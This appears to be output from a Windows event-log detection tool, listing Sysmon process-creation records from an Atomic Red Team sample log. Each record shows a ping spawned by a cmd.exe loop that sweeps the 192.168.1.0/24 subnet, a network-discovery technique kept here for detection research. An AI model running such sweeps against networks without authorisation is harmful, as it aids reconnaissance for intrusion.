+2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.62  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.63  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.64  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.65  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.66  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.67  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.68  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.69  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.70  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.71  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.72  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.73  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.74  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.75  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.76  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.77  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.78  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.79  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.80  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.81  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.82  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.83  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.84  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.85  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.86  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.87  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.88  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.89  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.90  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.91  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.92  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.93  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.94  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.95  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.96  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.97  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.98  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.99  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.100  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.101  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.102  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.103  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.104  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.105  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.106  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.107  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.108  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.109  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.110  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.111  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.112  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.113  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.114  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.115  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
